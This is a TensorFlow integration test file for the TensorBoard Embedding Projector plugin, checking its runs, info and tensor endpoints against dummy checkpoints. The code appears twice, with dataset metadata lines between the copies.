# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Integration tests for the Embedding Projector."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gzip
import io
import json
import os
import numpy as np
from werkzeug import test as werkzeug_test
from werkzeug import wrappers
from google.protobuf import text_format
from tensorflow.contrib.tensorboard.plugins.projector.projector_config_pb2 import ProjectorConfig
from tensorflow.core.protobuf import saver_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import gfile
from tensorflow.python.platform import test
from tensorflow.python.training import saver as saver_lib
from tensorflow.tensorboard.backend import application
from tensorflow.tensorboard.backend.event_processing import event_multiplexer
from tensorflow.tensorboard.plugins.projector import projector_plugin
class ProjectorAppTest(test.TestCase):
def setUp(self):
self.log_dir = self.get_temp_dir()
def testRunsWithValidCheckpoint(self):
self._GenerateProjectorTestData()
self._SetupWSGIApp()
run_json = self._GetJson('/data/plugin/projector/runs')
self.assertEqual(run_json, ['.'])
def testRunsWithNoCheckpoint(self):
self._SetupWSGIApp()
run_json = self._GetJson('/data/plugin/projector/runs')
self.assertEqual(run_json, [])
def testRunsWithInvalidModelCheckpointPath(self):
checkpoint_file = os.path.join(self.log_dir, 'checkpoint')
f = open(checkpoint_file, 'w')
f.write('model_checkpoint_path: "does_not_exist"\n')
f.write('all_model_checkpoint_paths: "does_not_exist"\n')
f.close()
self._SetupWSGIApp()
run_json = self._GetJson('/data/plugin/projector/runs')
self.assertEqual(run_json, [])
def testInfoWithValidCheckpoint(self):
self._GenerateProjectorTestData()
self._SetupWSGIApp()
info_json = self._GetJson('/data/plugin/projector/info?run=.')
self.assertItemsEqual(info_json['embeddings'], [{
'tensorShape': [1, 2],
'tensorName': 'var1'
}, {
'tensorShape': [10, 10],
'tensorName': 'var2'
}, {
'tensorShape': [100, 100],
'tensorName': 'var3'
}])
def testTensorWithValidCheckpoint(self):
self._GenerateProjectorTestData()
self._SetupWSGIApp()
url = '/data/plugin/projector/tensor?run=.&name=var1'
tensor_bytes = self._Get(url).data
tensor = np.reshape(np.fromstring(tensor_bytes, dtype='float32'), [1, 2])
expected_tensor = np.array([[6, 6]], dtype='float32')
self.assertTrue(np.array_equal(tensor, expected_tensor))
def _SetupWSGIApp(self):
multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=application.DEFAULT_SIZE_GUIDANCE,
purge_orphaned_data=True)
projector = projector_plugin.ProjectorPlugin()
projector.get_plugin_apps(multiplexer, self.log_dir)
plugins = {'projector': projector}
wsgi_app = application.TensorBoardWSGIApp(
self.log_dir, plugins, multiplexer, reload_interval=0)
self.server = werkzeug_test.Client(wsgi_app, wrappers.BaseResponse)
def _Get(self, path):
return self.server.get(path)
def _GetJson(self, path):
response = self.server.get(path)
data = response.data
if response.headers.get('Content-Encoding') == 'gzip':
data = gzip.GzipFile('', 'rb', 9, io.BytesIO(data)).read()
return json.loads(data.decode('utf-8'))
def _GenerateProjectorTestData(self):
config_path = os.path.join(self.log_dir, 'projector_config.pbtxt')
config = ProjectorConfig()
embedding = config.embeddings.add()
# Add an embedding by its canonical tensor name.
embedding.tensor_name = 'var1:0'
config_pbtxt = text_format.MessageToString(config)
with gfile.GFile(config_path, 'w') as f:
f.write(config_pbtxt)
# Write a checkpoint with some dummy variables.
with ops.Graph().as_default():
sess = session.Session()
checkpoint_path = os.path.join(self.log_dir, 'model')
variable_scope.get_variable(
'var1', [1, 2], initializer=init_ops.constant_initializer(6.0))
variable_scope.get_variable('var2', [10, 10])
variable_scope.get_variable('var3', [100, 100])
sess.run(variables.global_variables_initializer())
saver = saver_lib.Saver(write_version=saver_pb2.SaverDef.V1)
saver.save(sess, checkpoint_path)
if __name__ == '__main__':
test.main()
| 36.413793
| 97
| 0.726136
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gzip
import io
import json
import os
import numpy as np
from werkzeug import test as werkzeug_test
from werkzeug import wrappers
from google.protobuf import text_format
from tensorflow.contrib.tensorboard.plugins.projector.projector_config_pb2 import ProjectorConfig
from tensorflow.core.protobuf import saver_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import gfile
from tensorflow.python.platform import test
from tensorflow.python.training import saver as saver_lib
from tensorflow.tensorboard.backend import application
from tensorflow.tensorboard.backend.event_processing import event_multiplexer
from tensorflow.tensorboard.plugins.projector import projector_plugin
class ProjectorAppTest(test.TestCase):
def setUp(self):
self.log_dir = self.get_temp_dir()
def testRunsWithValidCheckpoint(self):
self._GenerateProjectorTestData()
self._SetupWSGIApp()
run_json = self._GetJson('/data/plugin/projector/runs')
self.assertEqual(run_json, ['.'])
def testRunsWithNoCheckpoint(self):
self._SetupWSGIApp()
run_json = self._GetJson('/data/plugin/projector/runs')
self.assertEqual(run_json, [])
def testRunsWithInvalidModelCheckpointPath(self):
checkpoint_file = os.path.join(self.log_dir, 'checkpoint')
f = open(checkpoint_file, 'w')
f.write('model_checkpoint_path: "does_not_exist"\n')
f.write('all_model_checkpoint_paths: "does_not_exist"\n')
f.close()
self._SetupWSGIApp()
run_json = self._GetJson('/data/plugin/projector/runs')
self.assertEqual(run_json, [])
def testInfoWithValidCheckpoint(self):
self._GenerateProjectorTestData()
self._SetupWSGIApp()
info_json = self._GetJson('/data/plugin/projector/info?run=.')
self.assertItemsEqual(info_json['embeddings'], [{
'tensorShape': [1, 2],
'tensorName': 'var1'
}, {
'tensorShape': [10, 10],
'tensorName': 'var2'
}, {
'tensorShape': [100, 100],
'tensorName': 'var3'
}])
def testTensorWithValidCheckpoint(self):
self._GenerateProjectorTestData()
self._SetupWSGIApp()
url = '/data/plugin/projector/tensor?run=.&name=var1'
tensor_bytes = self._Get(url).data
tensor = np.reshape(np.fromstring(tensor_bytes, dtype='float32'), [1, 2])
expected_tensor = np.array([[6, 6]], dtype='float32')
self.assertTrue(np.array_equal(tensor, expected_tensor))
def _SetupWSGIApp(self):
multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=application.DEFAULT_SIZE_GUIDANCE,
purge_orphaned_data=True)
projector = projector_plugin.ProjectorPlugin()
projector.get_plugin_apps(multiplexer, self.log_dir)
plugins = {'projector': projector}
wsgi_app = application.TensorBoardWSGIApp(
self.log_dir, plugins, multiplexer, reload_interval=0)
self.server = werkzeug_test.Client(wsgi_app, wrappers.BaseResponse)
def _Get(self, path):
return self.server.get(path)
def _GetJson(self, path):
response = self.server.get(path)
data = response.data
if response.headers.get('Content-Encoding') == 'gzip':
data = gzip.GzipFile('', 'rb', 9, io.BytesIO(data)).read()
return json.loads(data.decode('utf-8'))
def _GenerateProjectorTestData(self):
config_path = os.path.join(self.log_dir, 'projector_config.pbtxt')
config = ProjectorConfig()
embedding = config.embeddings.add()
embedding.tensor_name = 'var1:0'
config_pbtxt = text_format.MessageToString(config)
with gfile.GFile(config_path, 'w') as f:
f.write(config_pbtxt)
with ops.Graph().as_default():
sess = session.Session()
checkpoint_path = os.path.join(self.log_dir, 'model')
variable_scope.get_variable(
'var1', [1, 2], initializer=init_ops.constant_initializer(6.0))
variable_scope.get_variable('var2', [10, 10])
variable_scope.get_variable('var3', [100, 100])
sess.run(variables.global_variables_initializer())
saver = saver_lib.Saver(write_version=saver_pb2.SaverDef.V1)
saver.save(sess, checkpoint_path)
if __name__ == '__main__':
test.main()
| true
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.